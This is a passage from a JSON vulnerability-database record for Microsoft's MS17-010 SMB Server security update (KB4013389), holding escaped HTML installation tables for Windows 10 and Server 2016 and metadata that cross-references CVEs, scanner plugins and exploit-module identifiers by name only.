x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "enchantments": {"dependencies": {"modified": "2020-03-17T14:34:52", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-03-17T14:34:52", "rev": 2, "value": 6.6, "vector": "NONE"}}, "hash": "d1dcab535c9bd212ebaacf208acde40134bde87dcba60e8e14fbbf81342169a4", "history": [], "href": "https://support.microsoft.com/en-us/help/4013389/", "id": "KB4013389", "immutableFields": [], "kb": "KB4013389", "lastseen": "2020-03-17T14:34:52", "modified": "2017-03-14T17:40:20", "mscve": "", "msfamily": "", "msimpact": "Remote Code Execution", "msplatform": "", "msproducts": ["14135", "13230", "14478", "14562", "14113", "13228", "11721", "14210", "15514", "17381", "11728", "19589", "11740", "15511", "16735", "11733", "17508", "11719", "14492", "16710", "17651", "17654", "16730", "19759", "13236", "14496", "14490", "14139", "13233", "14501", "14440", "17360", "18472", "19756", "14136", "16625", "13234", "19754", "17657", "14503", "17344", "18875", "14131", "17542", "11708"], "msrc": "MS17-010", "msseverity": "Critical", "objectVersion": "1.5", "parentseeds": [], "primarySupportAreaPath": [{"id": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "name": "Windows Server 2016", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "published": "2017-03-11T21:22:44", "references": [], "reporter": "Microsoft", "superseeds": ["KB2508429", "KB896422", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB2536275", "KB957095", "KB3177186", "KB958687", "KB975517"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dc52833c-eac7-25b7-b942-b2dfcfbace09", "name": "Windows Server 2012 R2 Essentials", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "8540b382-5304-d506-ece2-a936dd11d66e", "name": "Windows 10, version 1511, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "name": "Windows Server 2008 R2 Datacenter", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "12db0355-c78b-b1b8-0c13-671906e0652d", "name": "Windows Server 2016 Essentials", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "6a967721-27d9-bd5f-9029-99ca5f0436dd", "name": "Windows Server 2012 R2 Foundation", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "e2b2a040-324c-43bf-447c-75aab15e2570", "name": "Windows Server 2012 Foundation", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "name": "Windows Server 2012 R2 Datacenter", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "1b3bc777-c681-e378-d422-eb618baa26f9", "name": "Windows Server 2012 Essentials", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "670009af-2bc1-fa29-d4a5-99c02e923013", "name": "Windows Server 2008 R2 Standard", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "name": "Windows Server 2012 R2 Standard", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "e51103b3-9b99-948e-95ff-fd63b48f329b", "name": "Windows 10, version 1607, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "name": "Windows Server 2016 Standard", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "ceefced2-0d6f-a4bd-50d6-875c871b8250", "name": "Windows Server 2012 Datacenter", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "4af945c2-8a39-6b82-777b-5067ce2c9216", "name": "Windows Server 2012 Standard", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "86630540-cb68-b324-567b-e197838cd28b", "name": "Windows RT 8.1", "parent": "13d0da43-f4d6-9f8e-d090-ed3881084c6e", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "b5011041-7904-59f1-97ca-53b1da5812fb", "name": "Windows 7 Starter", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "name": "Windows 10", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "2994eca6-696c-b523-20de-40b02211bb3b", "name": "Windows Server 2008 R2 Enterprise", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "32719e08-ef7b-a697-0697-ec02d753dbb5", "name": "Windows Server 2008 R2 Web Edition", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "name": "Windows Server 2008 R2 Foundation", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "e51103b3-9b99-948e-95ff-fd63b48f329b", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "6f18bf60-d0f1-8298-413b-89f6e8170528", "670009af-2bc1-fa29-d4a5-99c02e923013", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "32719e08-ef7b-a697-0697-ec02d753dbb5", "e2b2a040-324c-43bf-447c-75aab15e2570", "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "1b3bc777-c681-e378-d422-eb618baa26f9", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "b5011041-7904-59f1-97ca-53b1da5812fb", "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "8540b382-5304-d506-ece2-a936dd11d66e", "f62ed778-6986-d76e-c007-40a28315ffbf", "86630540-cb68-b324-567b-e197838cd28b", "928d79ba-72eb-762f-39be-122173e95922", "12db0355-c78b-b1b8-0c13-671906e0652d", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "ceefced2-0d6f-a4bd-50d6-875c871b8250", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "4af945c2-8a39-6b82-777b-5067ce2c9216", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "2994eca6-696c-b523-20de-40b02211bb3b", "417baa75-0c45-df0a-8e65-960580d94f42", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "dc52833c-eac7-25b7-b942-b2dfcfbace09", "2b2eeb95-d89c-6614-0db5-88f09133ede6", "6a967721-27d9-bd5f-9029-99ca5f0436dd"], "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "type": "mskb", "viewCount": 128}, "differentElements": ["published"], "edition": 2, "lastseen": "2020-03-17T14:34:52"}], "viewCount": 479, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mskb", "idList": ["KB4012598"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-01-01T22:39:28", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-01T22:39:28", "rev": 2}}, "objectVersion": "1.5", "kb": "KB4013389", "msrc": "MS17-010", "mscve": "", "msplatform": "", "msfamily": "", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2508429", "KB896422", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB2536275", "KB957095", "KB3177186", "KB958687", "KB975517"], "parentseeds": [], "msproducts": ["14135", "13230", "14478", "14562", "14113", "13228", "11721", "14210", "15514", "17381", "11728", "19589", "11740", "15511", "16735", "11733", "17508", "11719", "14492", "16710", "17651", "17654", "16730", "19759", "13236", "14496", "14490", "14139", "13233", "14501", "14440", "17360", "18472", "19756", "14136", "16625", "13234", "19754", "17657", "14503", "17344", "18875", "14131", "17542", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "e51103b3-9b99-948e-95ff-fd63b48f329b", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", 